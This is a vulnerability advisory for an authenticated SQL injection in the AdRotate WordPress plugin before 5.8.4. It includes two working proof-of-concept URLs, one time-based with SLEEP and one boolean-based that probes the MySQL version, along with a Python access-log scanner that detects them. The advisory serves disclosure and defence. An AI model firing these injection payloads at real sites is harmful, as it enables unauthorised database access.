AdRotate < 5.8.4 - Authenticated SQL Injection

Description
An authenticated SQL injection exists in AdRotate 5.8.3.1 via the "id" parameter. Exploitation requires a user with administrator privileges.

NOTE: The plugin author mistook this SQLi bug for XSS, but the remedy remains effective.

Proof of Concept
The "id" parameter is vulnerable to SQL injection.

Example 1:
http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=1+AND+SLEEP%2810%29

Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=1 AND SLEEP(10)

This query delays page load by 10 seconds.

Example 2:
By using a boolean-based technique, one can extract information about the system.

http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=2+AND+1%3D%28SELECT+IF+%28+GREATEST%28+ORD%28MID%28%40%40version%2C+1%2C+1%29%29%2C+1%29+%3D+53%2C+1%2C+0%29%29

Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=2 AND 1=(SELECT IF ( GREATEST( ORD(MID(@@version, 1, 1)), 1) = 53, 1, 0))

This query checks whether the first character of the MySQL version string is "5".
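As an added defensive example (not part of the original advisory), the following Python scans web-server access-log lines for requests to the vulnerable adrotate-statistics page whose "id" parameter is not a plain integer, and labels the two payload styles shown above. It assumes the Apache/nginx "combined" log format and that a legitimate group id is always an integer; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format: client, identd, user, [timestamp], "request line" ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+"')

def check_request(target):
    """Return the offending id value if the request hits the AdRotate statistics page with a non-integer id, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('/wp-admin/admin.php'):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)   # decodes %xx and '+'
    if qs.get('page') != ['adrotate-statistics']:
        return None
    for value in qs.get('id', []):
        if not value.strip().isdigit():
            return value          # a legitimate group id is a plain integer
    return None

def classify(payload):
    """Label the injection style so the analyst knows what to correlate in DB metrics."""
    up = payload.upper()
    if 'SLEEP(' in up or 'BENCHMARK(' in up:
        return 'time-based'
    if 'SELECT' in up or ' AND ' in up or ' OR ' in up:
        return 'boolean-based'
    return 'malformed-id'

def scan_log(lines):
    """Return (ip, timestamp, payload, style) for each suspicious AdRotate request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        payload = check_request(m.group('target'))
        if payload is not None:
            findings.append((m.group('ip'), m.group('ts'), payload, classify(payload)))
    return findings

# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jun/2020:10:00:01 +0000] "GET /wp-admin/admin.php?page=adrotate-statistics&view=group&id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Jun/2020:10:00:09 +0000] "GET /wp-admin/admin.php?page=adrotate-statistics&view=group&id=1+AND+SLEEP%2810%29 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Jun/2020:10:00:15 +0000] "GET /wp-admin/admin.php?page=adrotate-statistics&view=group&id=2+AND+1%3D%28SELECT+IF+%28+GREATEST%28+ORD%28MID%28%40%40version%2C+1%2C+1%29%29%2C+1%29+%3D+53%2C+1%2C+0%29%29 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [03/Jun/2020:10:01:00 +0000] "GET /wp-admin/admin.php?page=adrotate-groups&id=1 HTTP/1.1" 200 2048',
]
```

Because the page requires an administrator session, any hit from this scan points at either a compromised admin account or a malicious insider, which should drive the response.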

Affects Plugin

Fixed in version 5.8.4

References

URL https://ajdg.solutions/blog/adrotate-5-8-4-security-update/
URL https://plugins.trac.wordpress.org/changeset/2316932/adrotate

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)
Submitter Nguyen Anh Tien
Submitter Website https://research.sun-asterisk.com/
Submitter Twitter https://twitter.com/vigov5
Views 20616
Verified No
WPVDB ID 10249

Timeline

Publicly Published 2020-06-03
Added 2020-06-03
Last Updated 2020-06-04
